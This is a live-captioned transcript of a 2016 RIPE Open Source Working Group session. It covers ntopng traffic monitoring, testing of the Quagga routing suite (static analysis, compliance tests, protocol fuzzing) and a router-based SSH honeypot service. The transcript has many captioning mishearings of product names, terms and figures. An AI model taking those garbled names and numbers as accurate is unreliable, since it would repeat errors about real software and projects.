Archives

Open Source Working Group session
26 May 2016
11 a.m..


CHAIR: Good morning. Sorry we are a little bit late, the previous Working Group wanted to have an extra half an hour, and they promised they will get a watch for the next time.

Welcome to the Open Source Working Group. As somebody already noticed, our slides are missing, so, some test systems, we have some copy and waster error, sorry about that, but this is RIPE 72 if you are not sure, and you are in Copenhagen.

Okay. To start. We have quite a full agenda again. I hope you are happy from the talks. So, first of all, from the administrative part, we have a nice scribe again over there who basically got selected, or maybe volunteered, thank you anyway, I'm not sure that we have anybody who is watching the chat ‑‑ okay, perfect, so if you are watching it online, get online if you have questions so you can ask questions back there. The previous minutes, I do believe they were sent out to the mailing list. If not, they are definitely on the website ‑‑ they should be there, if not, then blame us for it, then it's our fault. We don't want to blame the persons who wrote the minutes, so it would be our fault, but I believe they should be there. If anyone has any comments on that, I assume not.
So, let's start with the talks. I'll hand it over to Andrei.



SPEAKER: Thank you very much, we have a lot of very interesting talks and also two lightning talks at the end of the session, so I will not delay it and I will start with an invite to the stage Luca Deri. I presume you are speaking alone, Luca is going to speak about high speed negotiating traffic monitoring.


LUCA DERI:: Good morning. My talk will be about the next generation that that we have started to develop a couple of years ago. At the end of this session, okay, you will hear a bit about the project, what is this about? If you want to know more, we'll be running a tutorial in room number 2, at 3:00pm. So you can ask questions and have a more detailed introduction.

So, what is ntop. This is a small company that is doing basically open source and network traffic monitoring, we started in Nate with the first original version of ntop, we are now continuing along that line. Over the years, we had to face with challenges such as ISP bucket capture to analyse traffic. Then we have developed over tools such as ISP drivers Tor 140 and 100 gigabit intelnet kernel in the inter cards. The packets information, Open Source library, NDP I and so on. In essence we are creating an ecosystem that go functional to monitoring network at the very high speed.

Our approach so network monitoring is a different to what many vendors do, in essence, when years ago when we started network monitoring was very expensive. In a way it's still expensive but not as expensive as it used to be. What we wanted to do was analyse traffic. We couldn't rely just on SMTP, we started to play with packets to analyse them them and to see what was happening with them, to troubleshoot the networks to understand the issues and to improve it. We believe that without measuring traffic, we believe that what we thought to implement is really happening in the network. So this is the whole idea. We don't want to be blocked by vendors so we don't want to do anything like that. We want to be independent from vendors, try to support the standards like free set flow, but at the same time be free to innovate without waiting vendors to implement information elements in their machines.

Just to give you an overview of what we are doing because we are at the Open Source Working Group. Our tools are divided in two categories. We have some commercial once and free once that allows us to survive. The main problem with Open Source is that many people are using the tools but not many are willing to support them. And so we have the feeling that for many people Open Source means just free. They don't care about the source. People actually don't even use the source most of the time. A very small portion of the community you know, perceives the source as a value. So therefore, let's say we are providing people you know free tools for the search. Unfortunately this means that most of the time, the most we can expect is just feedback or bug report. It's a little bit poor because support, in terms of code contribution would be desirable.

And at the same time, like I said, cannot really survive with pure Open Source tools because the donation we received last year being very negligible. Just to give you an example. So therefore we have decided to create the premium version on top of the Open Source tools, such as like I have said, this afternoon we will be introducing a tool, more traffic visibility tools, DD S mitigation software, something like that, at the same time we have decided that that because we are coming from the free Internet community, we have to reward the people of our group, so, we are not charging only for the commercial tool. So continuation is another story because it's free in ntopng) so this is our way of doing that. So other nation also live on top of our own RIRses thanks to those that buy the commercial versions.

In terms of coding, if you are interested. So everything, we do is on GitHub. That was a decision we made last year because for years we are using private SVN and we thought that GitHub was important not just because of GitHub per se, but because today if you are not on GitHub you basically don't exist. You might like it or not but this is the conclusion we have made. So, therefore, we decide to go there. The transition was pretty smooth and we believe it was a good move.

Also because we have other tools like Travis that come for free that do continuous testing so the quality has improved, and also the way GitHub works allows people to give us contribution. In particular, we receive contributions for the packet inspection Open Source library, that I will go through later, more than with ntopng because with network people we have the feeling they are using tools bus they are not existing and contributing because most of the time their network is not part of the culture, whereas those who use libraries, like are coding. So they are more interested in providing even code err support for the protocols they are interested in.

So, back to our topic. Some history. In 1998 I started ntop, the original one. As you can see from the screen, it is you know, part of the history now, it was using something that was very interesting in those days, but that now is very outdated. For instance, this was the web who I available. And at some point that is start over because there were enough changes there, HTML, is different, you have Java script, and other things, so it was time to give a fresh start to this project. Also, because in terms of protocols, the protocols have changed. In those days. These days they disappeared, so we had to focus on different aspects.

So, therefore we wanted to create a new software able to scale first of all, at least to 10 gigabit. To be open to extension. To be scriptable. So that the users can use it to extend it, to fetch data from the application itself. Because ntopng has a web gooey but this does not mean that you have to use it, you have to perceive it as a server. You put it on your network, it is grabbing flows or analysing packets and that's it, so it's a sort of database. And out of it, you can extract the data to create our own reports or use the embedded web interface, it's a source of data. Yet another source of data. And in these days unfortunately, with things like formats, it's a source, period. There is nothing magic in packets any more, whereas in the past there used to be the BGP expert, the NetFlow expert and this expert. So now it's just pure data that you have to integrate with your infrastructure. If you have SLMP, NetFlow, other types of information, log, everything can go into the same system.

So what is ntopng doing? First of all it's a tool for monitoring the quality of ex experience and service. It's important. It's designed for companies probably it's a little bit borderline for RIPE, I mean for people that are mostly interested in BGP based information. But it gives you an idea of what is happening on your network in realtime. Okay. There is no delay. No average numbers, lucky NetFlow. Nothing, happens happens it happens in realtime in the web interface. It has been designed from scratch. Like I said based on the principle that the engine is separated from the web interface. So the web interface is written in lower, the other is written in the C++. Engine must survive to attacks to is won't trash it. This is an important thing we have implemented. It must survive to people that are clicking on the web gooey. Essentially it's divided into two layers. The engine is C++, the lieu apart allows you to render data on your screen, it allows you to export data to other systems.

The monitoring engine has three main concepts. The interface, so ntopng can is it's not just a physical interface from which you are seeing packets. You can receive flows from the outside, you know, you have for instance a net flow router so this is an example of a collector interface, then you have the constant host. So all the hosts that are on an interface can display the information in the flows that belong to the host and of course the concept of flow.

Ntopng divides the host into two different categories. Local and remote. Local means that the those hosts resource important for us because they belong to our infrastructure. So it means we want to keep the statistics for those hosts, mostly per statistics. We want to know more about them. Remote means that they are other host that is do not belong to our domain, that contact us, let's say when we went to Facebook, we don't want to keep statistics on Facebook, we want to keep statistics on hosts going to Facebook, this is the main distinction. And of course because everything is dynamic, similar to what happens in a flow cache, ntopng is implementing the same, a lifecycle, so basically when a host is static for a little bit of time it's gone from memory and the same map is memory. When it's purged this is written on a database if you are interested.

Like I have said before, in addition to pure packet processing, we are creating an Open Source library based on an existing no longer maintained library called open DPI for the packet inspection. Some people are kind of scared of these packet lay load. We don't want to inspect those packets for spying people but we want to do that for characterising traffic. This is very important. Today cannot really rely in part or protocol because they are not really meaningful for many people. HTTP doesn't mean TCP port 80, at least in our understanding. Therefore we have decided it have time to create a free and open DPI tool kit. But because this is analysing packet pay loud, Open Source here is very important because you can inspect what's going on. Cannot simply assume that the devices made by companies that are looking at your traffic pay load are doing that properly. At least this was our understanding.

So that's where ntopng, and another libary you can find on GitHub, it's opensource GPL v3, we support all the modern protocols, not just the simple ones, but even the complicated ones, all the changing protocols like all these. Basically, it is able to categorise traffic and report to us limited metadata. When I say limited, I mean what it is meaningful for network monitoring. If you have SSL, it gives us the SSL host name, okay part of the certificate or if you have BitTorrent it gives us the hash so you can figure out what type of activities that people are doing. But, it is not designed at all for extracting met data like e‑mail source, destination, so it's not at all for lawful interception of these kind of tools. It is used only for traffic visibility, to characterise traffic.

As you can see in ntopng we have this user interface that is displaying traffic in realtime. It allows people to scroll, okay, to see the top down, to see what type of real protocols they have done, what type of activities these people are carrying on that are usually not possible with standard NetFlow tools unless you have augmented flows.

As you can see we have historical support, we store historical data optional feature. Everything see here is doable from the web interface. It is simple to extract PCAPs. If you have for specific host the need to send PCAPs, you can send on the web interface, using this you can extract the PCAP belonging to the flow that you have seen.

In the ntopng dashboard you can see the activities and everything you see is an iPad link, so clicking on a host or a flow allows to you drill down and see extra information. This is an example of a flow. As you can see here on the flow you don't see just bytes and packets but you are able to characterise the network latency or the application latency so how the application is reacting to people's requests. You can see for instance the intrapacket delay for learning about flows that are idol, so, that means it might be you know, a kind of attack or this type of activity is happening on your network.

And the same for host view. We also characterise all the traffic of our host into a single consistent view. We have the ability of looking at historical traffic. If you start ntopng saying okay, save historical data to a database, you can see what's happening. You can drill down, okay, you can see top talkers, top flows, you know, anything you are interested in, you should be really possible.

So just to conclude.

If you are interested in testing our tool, you have two options. One is to get the code on GitHub, you download it, you compile it yourself, another option is to use a binary package. Ntopng is part of Linux distribution like Abuntu, it is also possible for you to use our packages that we are building every night, packages dot ntop dot org you can download them an install them with whatever, these are the laysest thing. And instead if you are using docker, okay docker has the ability okay of running software in a very simple way so we also provide a what you can use for that.

If you are interested this afternoon we are running a two hour session in the second room, that is over there. If you want to see what's happening, if you want to help us discussing the road map and providing feedback for future work items, you are really welcome. We invite you to be there this afternoon. Thank you very much.

CHAIR: Thank you

AUDIENCE SPEAKER: Alex on, speaking for me. Do you support ER span?

LUCA DERI: You mean receiving encapsulated packets?

AUDIENCE SPEAKER: Over Jori?

LUCA DERI: I think we support it on the probe not ntopng. This is interesting, we can definitely support it because we have to back port the code. A simple addition.

AUDIENCE SPEAKER: I think it's a very important case.

LUCA DERI: Can you open an issue on GitHub so we can do that. Thank you.

AUDIENCE SPEAKER: Hello, Constance. Hi Luca, I am familiar with your work many many years ago. My main question is, from what I understand, for the low level stuff, you bypass on how the kernel and you process packets in user space with a so‑called PF ring infrastructure of yours. The first is, are you dependent in some sort of driver? Do you utilise any network card? And what kind of performance, package per second or bandwidth are you able to process currently?

LUCA DERI: You have two options. One is the kernel module that sits on top of Linux that can give you the ability of analysing a couple of million packets per second. If you want extreme speed you have to use arm err defined drivers, we have drivers for Intel cards, 1, 10, 40 and 100. For instance a couple of weeks ago we released the driver for Intel 100 G. It's good. So you can visualise the card. You can handle 60 million packets per second capturing, we can have multiple queue, you can really scale up. The point is that ntopng is for interface able to handle about 4 to 5 million packets per second because we are keeping flows in packets but we know people that are sending us S flows or NetFlow that are able to handle 100 gigabits especially for Internet exchange points. It depends on if you are processing traffic somewhere or if you want to process everything inside ntopng.

AUDIENCE SPEAKER: Philippe from NetAssist. I have a question about the structure of ntopng. How it works with multi‑card systems and how it scales on the curves and how it scales horizontally.



LUCA DERI: In ntopng we have one interface and one core. You have to allocate one Kerr IPv4 better face, if the interface is too fast you have to visualise it with RSS. It means that the ntopng you create one interface, so one thread interface and you have the conat the present time of interface view that allows to you merge those interfaces into one single one. Ntopng is designed for attending a big network unless you reprocess the traffic. That is the way we scale.

AUDIENCE SPEAKER: We need to talk in private a little. It may be done. I can help new this.

ONDREJ FILIP: Thank you very much Luca. The next speaker is a co‑chair of this session, Martin Winter, if you know Martin, he is also wanting to talk about testing of the Open Source routing implementation, even at very late night he is ready for such talk, so I think he is the best person to deliver a talk about this topic. So. Please.

MARTIN WINTER: Welcome everyone. I want to talk a little bit about some ideas we have on how we test like a routing protocol, and the challenge we faced there and I'm using Quagga as an example because that's what I'm working on but a lot of these things may apply to any other especially Open Source committee with routing stack, so it could be used for any other of the routing stacks too, some of the things may even be hints if you test commercial routers, some ideas what you can do.

I think I probably can skip that one. Just Open Source routing, we are part of NetDev basically, which is the company I work for which is a non‑profit there so we do basically on the Open Source routing, mainly working on Quagga.

So, before I even go into the specific test tools, I want to talk a little bit on the building will tool, because especially if you work in the Open Source, a lot of the things is also from compiling, you can find some really cooler errors and issues too.

So, the overview ASN example when I build like a Quagga normally, I don't just build on a simple Linux there, I basically DUIDed to build it all on a the different Linux distributions. So I have basically build systems for working with sent OS, all these here, 1404, 1604, the thing is they have different versions of libraries that they use so I want to make sure everything links against that and sometimes you end up with something that something doesn't end up compatible there and it's important to notice this as early as possible.

I'm also doing had a that in virtual machines. The main advantage is there are easy snapshots, so when you build it you can install on it and at the end you say okay I'm done, I take the packages down and then I go and reset the whole machine back to the beginning. One key thing there is there is a security device, because obviously my system kicks in automatically, anyone who writes in code, it will build, I'm slightly worried too there might be something bad in there too. It helps me at least that I get everything cleaned out again after each build.

Different CPU architectures, I would say it's great if you have the resources. I would love to do that too, but I'm already running about 14 different verses of machines for building in parallel that I so far a big limit on resource and I'm not doing that, but you really, if you support different architecture, would be very useful sometimes to build and test on a big NDN and a little NDN systems specifically.

Next to build something which I hope you are doing, is static analysers there are a few different products out there. I really like the C landing which is part of the LLVM thing, so there is basically a build analyser thing, it's a tool called in there, it generates the key thing is like an HTML, web page is linked. This is an example output of one of these. It gives some summary on what issue it found. The cool thing, it's free. You can run is as many times as you want. You can download a report, you can archive it, for every run I archive all these web pages.

The challenge on the, on this specific static analyser is if you mainly want to track what changes from one version to another, it makes it very difficult. You probably don't have no errors or no warnings at all, because it obviously finds, or unfortunately quite a few faults, errors and attacks a few things as an error which it may not be. So you basically end up have to find out the way to pass it, in my case when somebody submits a patch I want to make a Dif on that output and tell them great thank you you fixed one of these warnings there or there is another warning there maybe you can go back to this URL and look at it and see if these are valid concerns or not.

One of the things which you may find a bit annoying is there are quite a few bad warnings. There is a classic example. You see like a loop. It's checking for point.0, it does something with it. It frees it and then the next line says oh hold on, that pointer is now nil, because it's no longer valid because I freed T however, if you see like the loop, it will verify that, that should be perfectly fine. So, there are things which are like you may think a little bit and you may not be happy. That's the sad advantage, or disadvantage basically, but it finds valid errors and we found a few issues already.

Another one which is quite common and like well known, coverity scan, if you do an Open Source check, it gets reviewed there, like if it's in GitHub specifically, they check the licence and approve it, it's free for you, for commercial product you have to pay for it. They have a nice web interface. It's basically a service which they run so you basically build some compile files, you upload it and they run the service. And it gives you that, that's like a summary there, it gives an output there. I have to say it has much less warns in there, most of the things are much more valid. I kind of likes it. It finds different things so don't choose just one of them. I really recommend do both.

The challenge is depending on your code size you can run it maybe between one times to ten times per week, so if you have a lot of submissions, you may not able to run is every single submission. And other thing is also when you want to look at the bugs, the user needs to go to that web page and log in. If you have an open source you want to keep it open. Every single user wants wants to look at the results has to be approved by the moderator for getting access and has to log in. You can't make it open for everyone looking at it.

It also has an nice thing that it causes like, gives you like an ID on like the bugs which you can nice for your tracking, but again, the problem with the web interface is you can't extract easily the data. It's not lining Clang where you can take all the pages and archive it. Here you have to log into their service.

This is a really fun one. Which I was really surprised on what they can do. You see classic, that's a typical copey and paste error, it notice that had there are two code blocks where they say, and like below that shouldn't be IPv6 link, maybe that's non link because that will make more sense. And I have to say I was very impressed that it actually can find things like this.

Another thing. Kind of open. Code coverage. Obviously I'm not doing it yet. There is a lot of discussions. If you are doing some code coverage testing, I would appreciate approaching me later, I will see how many things you find. I'm not really sure if I'm the extra work how valid it is. It obviously has to be done at sometime. But it's sometimes a bit challenging with tracking the costs with like packages built and everything.

So, now back to the testing tool. One of the reasons why I was inspired to give this talk is I hear so many people, sometimes like berth and go BGP and other ones that do some interesting testing but most of it is like interoperability. And so we take a router basically, the implementation, you connect it to some Cisco and Juniper and it works, oh it must be good. Sorry, it's not, it's probably a good starting point but you are missing out a lot of the test cases and the key thing, you are probably all familiar. On BGP, you probably know there are transitive attributes which if one implementation doesn't understand it, it has to forward it. So your box in a real network can receive some attributes from far corners out in the network which it doesn't understand may have an issue with it, but your Cisco and Juniper may just pass along. There was a lot of cases where error cases which you probably will have a hard time to reproduce, because Europe shouldn't produce or send out bad updates and the same thing for Juniper and Cisco, they will do their best to not send it but you are still supposed to accept it by some standards on packages. Some packages based on RFC, you have to accept and correct and process it. Some of them you have to accept, correct and send out corrected updates and you forward, some of them have to ignore, some of them you have to close the sessions. And these are like test cases which are very difficult, and every time you see large outages again because somebody sends something weird across the Internet, these are the things you would have a hard time catching just by interoperability.

What we use is like we use a commercial tool, IX an ANVL. This is a big disadvantage. It has a very high price tag. The problem is there are unfortunately like no real open source tools out there for compliance test, or basically nothing at all. It's such a small market even for commercial tools that's why they tend up a very high cost, it's like basically a few equipment manufacture and nobody else. So, having that compliance test is very challenging to find an Open Source solution. We use a commercial tool which we had to byte the bullet and buy something there.

The nice thing on it, it doesn't just test the compliance test, because the way it runs, it basically goes, figures out the specific topology of the test like one chapter of the RFC, then it configuration your DUT over the normal v‑ it I sharing case of Quagga, like its CLI, it reconfiguration it then for the next test. I find a lot of issues too when people accidentally basic interest CLI because it tests all the configuration of all the cases of weird stuff too. In our case we run about two and a half thousands tests. The other disadvantage is it takes a long time, multiple days for a full run. So, we basically paralyse some of these things trying to make it faster.

Another thing we do is protocol Fuzzer. If you are not familiar what that actually does is if you are looking at the protocol, here an example, a BGP open message, the protocol Fuzzer knows all the routing protocols and it knows basically what's correct and incorrect value so it has the know how, it goes in there and tries an example, the version, what happens if I don't have version 4 or version 6 in my open message, what happens there? And it tries all the weird value, it tries the very low value like 0 it, it may take something like 200 negative. It may try the maximum value and a few random values in between. It may try optional fields to skip them. It may have packages to say the TCP is much longer but it's a short trunkated package and all these things it goes through it. And it may need checks then does the router, yes it may kill the BGP session or disconnect it, but the router, or your test router should be reachable afterwards. When you bring a new session, it should open up and work. There shouldn't be a hang, a crash or performance going very, very slow.

We are using here again some commercial tool, the RFU Open Source Fuzzer is out there. The challenge is you spend a lot of time defining the protocol. All the Open Source Fuzzers do not understand routing protocols. You have to basically in the configuration to go and defined the routing protocols. How the packets look like to get something more than that complete random if you just do completely random packets you have a Fuzzer but it may take way more time to find it, we use these fancy test supports too. We don't publish them because if they pass, it's boring. If they don't pass, it's most likely security issues and we spend time fixing it.

The other thing obviously, routing protocol, we are not, if you are talking routing protocol, the forwarding doesn't matter to me that much. That's outside of at least Quagga, outside of something like a bird, that doesn't really matter. But the routing performance is to scale, what scale with I get to. This is a simple test case what I have for like. OSPF, I want to know what happens, how many routes can I do there? This is like for external routes, so I have simulated OSPF router, I have an external route and checked there, and I have two DU, its if you are wondering why I have two, because I want to basically announcements and receiving test basically at the same time, so it's just a short‑cut, if I just had one, I may not know some from the announcements forwarding the details if that all works too. The second thing is I test with traffic. I don't care basically, I won't go into the router do show IP route or something like that and count the routes and verify them that may drag down the user interface a lot. That may cause other things. And the second thing is it's not what you at the end care about. You care about when is it actually in the forwarding pass.

So, it's things like that looks simple. Then you think like, and then you may end up with some more surprising results. So, here you see three lines, the green one is for OSPF and that orange one is for ISIS. I have to say that's an old version of Quagga. I just showed that because it's an interesting random surprises. You expect like a nice steady line to go up to the maximum it can handle. Here you see on the green line, up to about 2,000 routes everything looked fine. And then suddenly above 2,000 routes every time I announced more routes it was like some delay in there. It looks like classic to something you may want to look for locations, buffer cleaning up or some bug in there. I can also see here at that time I got about five and a half OSPF routes and something above two thousand ISIS. So, that was like an interesting thing. Again, this is told slide but you will be surprised, even if you take a commercial router, you will not get what you expect for quite frequently. Have fun if you try that.

And have fun with the Win Doc to explain why.

The same thing obviously when he have OSPF next to internal route. I did similar thing. It takes a bit more calculation than the external time. And I simulated like a matrix and I wanted to see if I have like a 10x10 router matrix, what happens if I have 20 X 20 and go up and see where things just completely fail. This is like how it looked in a good case. 20 X 20 matrix it gets closer, about 800 routes. I tested routes to every single inter‑connection link there. And you can see first 15 seconds not much. There was like the hand shakes going on. And then most of the things came in and slightly later the rest of the routes came in and all was fine. So that was about a bit more than 30 seconds.

Then I said let's see what happens if I go a bit more. It's about 50 by 50. And that's how it looked like. It took a bit more thinking and then the whole thing got pushed down but do you see it didn't really reach the green line, what I expected. It was sitting there for sometime, not doing, it looked all right and then suddenly about a minute later in the forwarding everything disappeared again. And November half a minute later it came back. Obviously these are the bugs you want to look for, and the challenge is, to find these like basically that cannot just look for like how long do they take the total but how does it learn it? How does it look in a graph.

The challenge is basically how do you summarise it. There isn't a simple pass /fail. So it's very difficult to describe the results somehow if you do an automated test. Also, keep in mind, virtual machine, make sure you know the performance that your hype adviser isn't overloaded and you have a reliable performance if it is a virtual machine.

Tools for testing. BGP, E X A BGP I can highly recommend. It has good ways to check routes for verification. OSPF/ISIS, we are using traffic generators for most of these things. If you are into and what to build something I would highly welcome so you.

Obviously don't forgot everything in these tests you want to automate them. Especially if you are in Open Source. You are not a large company like Cisco, you basically don't have the manpower, so everything needs to be fully automated. So ‑‑ and don't forgot the result passing. If I just build things on a system and they are normal, contributed to the project, they will not read it, they will not go to the web page so what I have is basically everything automated from picking up the patch from the mailing list, going down to basically at the end, creating an e‑mail back to the end user saying like thank you, everything looks fine or hey, it failed compiling here in certain areas or it failed compile on this abundant aversion and here is the snippet from the output which is relevant.

A few more links if you are interested. I'll leave them in the slide. You can look at it, especially at the bottom there is a white paper which gives way more details.

And that's basically it.

ONDREJ FILIP: Are there any questions.

MARTIN WINTER: If you are doing any testing on routing protocols, please ping me because there seems to be a very small community. I would like to get some feedback, experience, exchange stuff.

ONDREJ FILIP: I have one question Martin actually. You know, we are also thinking about testing the way you are doing that, and my question is, how much money did you spend on those commercial tools, roughly?

MARTIN WINTER: Sorry, I didn't get ‑‑

ONDREJ FILIP: How much money do you spend on those commercial equipment are they in Open Source programme so you have to pay the normal price.

MARTIN WINTER: I see a huge value on it, part of it obviously you have limited resources, I would love to use Open Source tools, the problem is when things just don't exist I do not have the resources to start developing that on my own unfortunately because then my project wouldn't be Quagga, my project would be writing some test tools. So, it helps a lot. Especially if you are non‑profit, in the US sometimes some of these vendors are very nice to you and may even donate things so that helps too. And it's the challenges really there is not much there but I would really love to see more like non‑profit private and stuff there too. And there is more on BGP if you want to use BGP it's much easier there, if you have to test things like IS‑ISes or OSPF it's very challenging.

ONDREJ FILIP: Okay. Any other question? I see one.

AUDIENCE SPEAKER: Martin Levy at CloudFlare and thank you for doing all this work over quite a few years. Could you give us sort of a high level holistic view of how different Quagga is today versus when you started and how these tools, automated tools either, hopefully accelerated the changes to this code basis and it's a code basis we have all known for a long time.

MARTIN WINTER: So, the impact on it basically, a lot of the tests, the best results I get so far is out of the compliance tests and also from the building there on the different platform. When we started basically, Quagga normally built perfectly fine on Abuntu, but I know this e‑mail in the beginning it was quite some pain to get things building again on all the other distributions, and now because basically anyone who submits something to the Quagga community gets within an hour an e‑mail report back and tells memory immediately things broken, that helps a lot. I noticed a contributor, if they get a feedback back within a short time, they are extremely likely to fix it and resubmit it. And that's done before anyone even manually code reviews it and spends the time on it. The second thing is compliance. I notice all the time obviously things break, and I'm quite good on finding issues there. Compliance test report is obviously a big challenge because it's sometimes not that clear. The RFCs are not simple binary yes or no, that's correct. It's sometimes quite open to interpretation.

AUDIENCE SPEAKER: Gert Döring with my Open Source hat on. I'm active in the open VPN project. And what you describe is pretty much what we do as well. We have a build forum with all the different BSDs, Linuxes,Solaris, and every time something is committed, it gets built and tested on all these platforms, because we look at the patch we review it, everything looks fine and it works on Linux and all the BSCs explode because some these routing table interactions that open BGP has to do as well are just highly system specific. So, yes, this is good stuff.

MARTIN WINTER: You also have to keep in mind you can probably not expect every contributors access to every machine.

GERT DÖRING: No they don't. They have their machines and if they are really good willing, they test it on three different platforms and the fourth one explodes. So this is not malicious or negligence on the side of the contributors, but it's just too many different operating systems supported, and we don't even support all the stuff. Just the main stream stuff.

MARTIN WINTER: And you would be quite surprised the difference between like different versions of Abuntu for example, just from the package change that frequently breaks too, so just don't just one version of it.

GERT DÖRING: Then of course the affect flow through the test system is something that is surprisingly hard to test, to actually set up a virtual network and stuff packets through. So what you described is quite interesting.

ONDREJ FILIP: Thank you very much Martin.
(Applause)

Just before the session someone asked me is there going sob some presentation about some nusence in the Turis project. I said not exactly, but he is going to talk about a new project which is called the honeypot as a service and that's also run on the platform of tour I say project.


BEDRICH KOSATA: Hello everybody. I will, my talk will be let's say a pitch about something we are developing or started developing as part of the tourist project, but now we would like to spread it more to the public. So, I would like to find maybe interested parties to talk or cooperate on this.

So, just in the beginning, shortly, what is a honeypot? I don't think I have to tell you but just to be sure. Very simply, it's a machine that is vulnerable, has some open ports showing to the Internet, and the attacker can really lock in onto the machine or access this service, but he is observed from the outside and we record everything he does there, so it's very interesting to find out how the attacker behaves, what he does and so on.

Usually it's run in a simulated environment. It isn't a live machine but something assimilated so that the attacker cannot really do anything harmful, okay, so cannot send spam from there and so on.

And there are honey pots for different protocols. What comes so mind is SSH, TelNet, but also some other protocols are interesting. It's interesting for instance, to observe, to have a web proxy, open web proxy, which is something that attackers are looking for as well and see what they are trying to push through the proxy or also SMTPs is very interesting to see what they are trying there.

So, honey pots are very useful, they give you a lot of information, but they have some problems. We have been running honeypots for several years now, and the problems as we see them is that you usually only can run a small number of them. You don't have such a huge amount of, let's say, machines, and even if you did, you would have a problem with, for instance, IP addresses and the location of the machines, because you usually don't have so many prefixes to distribute the machines amongst them. And if you don't have many machines, with time, the IP addresses of the machines get recognised by the tackers and they don't come to the honeypot so often adds as before. So it doesn't work so well with time.

And another pit fall is that the assimilated environment isn't perfect. If it really was able to simulate the machine that it simulates really perfectly, then it would be the machine and it wouldn't be a simulation any more. The problem is that ‑‑ it's easy to find out where you are actually inside the honeypot, for example, by running a command with some specific switch that is not implemented in the honeypot or something like this. So, these are the pitfalls. And for the first two of them, decided that it would be great to run the honeypots by end users, so the users at home or when they are having ‑‑ when they have a server somewhere or whatever, so they could run honeypot there, which would give us a lot of let's say free honeypots or a lot more honeypots that we can run on our own.

And this is where the project Turis comes to the picture. Project Turis is something that was started three years ago and as part of this project we gave two users in Czech Republic about 2,000 of these blue boxes, which are routers, and that we use for, as a network security probe which we maintain centrally. And also, most of these routers have a public IPv4 address, which is very important if you want to have a honeypot, it has to be visible from the outside. And even though IPv6 is sketching on, I won't say that it's so popular amongst attackers yet, so most attacks we see only on IPv4.

Luckily, for us, we decided to give Turis to prefential people with public IPv4 address, so so this is okay with Turis.

So Turis is a honeypot. This was the idea. It has the advantage that there are a lot of them, much much more than we have on our own infrastructure. They are spread through the Czech Republic lick. Both Joe graphically and when it comes to ISPs, so a number of let's say, IPv4 prefixes available there is pretty large. And also, some IP addresses change from time to time when the ISP gives different addresses to the users users with time, so, this is also an advantage that they cannot get to a blacklist to easily. So we thought this was an interesting proof of concept. Let's try it, but a very important call was to ‑‑ that it must not endanger our users in any way. So, because the honeypot, even though it's simulated there might be some bug which would allow the attacker to break out of the honey bot and reach the machine itself. It shouldn't be possible, but who knows, so we decided we should somehow get around this, because in case the attacker really got out of the honeypot, he would be, he would see the whole network of the home user and this is something we didn't want to do.

So, we created something that we call honeypot as a service, and what it means in fact that when there is an attacker trying to, let's say, log into our router, to SSH for instance, we use our own server and redirect the traffic from Turis to this, to our server, and the honeypot is then run on this server from which the reply goes again back to the router and itst forwarded to the attacker. So the attacker thinks that he is communicating with the Turis router, but in fact everything is running on our server, and the Turis just forward the packets, or the traffic.

So, this is the idea of the honeypot as a service. What software we use for it? Sorry, we use it for SSH for now. We are planning some other implementations. The server is run at cz.nic, we maintain it. And the user just has to install a very small simple application on the router. So it's very easy for the user to start contributing to this honeypot project.

As it were, the way it works is that on our server, for every user, we have one port open to which we redirect the traffic, so we can easily distinguish from which router the data are coming. And because we maintain the server centrally, we can very easily also up braid it and if there's some, we find a new way how to recognise the honeypot that is used by the attackers, we can fix it and we don't have to deploy any updates to users or something, we just upgrade our server and it works okay.

The data that we get from the honeypot, the stuff that is SSH session that is we see there, the commands and so on, we log them centrally and then we present them to the users via web interface that they have for the router, and we also can do some kind of centralised analyse of all the data where we see the bigger picture from all the honeypots.

The software we use is on the server it's called Cowrie, it's written in Python, it's a form of an an older honeypot server called Kippo. We have modified it slightly to support the multiple ports running on multiple ports, if you would be interested, it's available on our GitHub, GitLab, we will also make is available on GitHub later on.

On the client, we use just a small application which is called mitmproxy, because what it in fact does is a man in the middle attack on the connection or something very similar. It's also open source, and it's also available on our GitLab, if you would be interested to see how it works.

Now, some results from, all the time we are showing from the traffic that we have observed in the honeypot this year.

We have something like 350 active users. This is because we didn't install it for all the users, we just asked them if they would be so kind and help us with this project, so 350 users from those 2,000 activated it. We got something like 2,000 SSH sessions per day from all these users, and roughly about 4 commands per session, but there are some sessions where there's only one command and there are some when there are even, I don't know, 50 commands or more. But these are relatively rare.

Since the start of this year we have seen something like 36 thousand unique IP addresses of attackers inside the honeypot. Here is, for instance, the distribution by country. You can see that Argentina is very active in this field. It wasn't the last year, I don't know what happened there, but this year it's very, they are much more active than they used to be. And this is ‑‑ when we have this data, we do some kind of analysis on this. We, for instance, look for common patterns, we try to find out attackers that use the same set of commands or behave in a similar way. One interesting example is, there is, there are some, something about 13,000 attackers that use the same set of commands, the same ‑‑ the session is completely the same, it's automated. More than 70% of them are from Argentina, and most of them are from Telefonica Argentina and most of them have one specific port opened which is used for DSL provisioning. We think that it might be someone discovered a hole inside this kind of machine that the Telefonica in Argentina uses and might have installed some kind of malware on these machines. It might be something different. But it's very interesting to find out some of the groups are located in a specific area or run by a specific ISP.

Here is how it looks like from, for the user. I obfuscated the IP addresses but you get the idea. The user of the Turis just logs into this web account and this is the list of sessions we have observed in the honeypot. He can drill down to individual sessions and see the commands that have been run there. This is a fairly typical session where you can see that the attacker tried to get some information about the machine, then he tried to do get some binary from the Internet, run it and see what happens. Then again some collection of data. This is fairly typical, especially the downloading of the malicious code. So we had a look at data from this. We have seen that during the, during this year we have seen something like 55,000 wget commands, and the IP addresses used in these to host these files, there was some, more than 600 of these addresses. Mostly from China, but also from US and other countries.

So, this was just an example of the data we can gather from this honeypot and what are the future plans for this? We will offered to Turis users and we would like to offer it to the public. Right now it's somehow built in into the infrastructure we use for Turis, but if we would like to open this and this is why I'm talking about it here. We would like to provide it for others to offer it for usage on servers or other routers and so on. We would also like to start publishing the data. Right now the data we get are covered by some kind of contract that we have with the user, so cannot release it to the public but in the future we would like to make this data open so that anybody can take the data and try to use them for their own research.

As I said we would like to create clients for common systems. And we would also like to work on improving the analysis of the data to find new stuff and so on.

The whole idea why we are doing this, is that we would like to really show people what is going on on the Internet, how dangerous a place it can be if you are not careful, and this is the main goal of the whole thing.

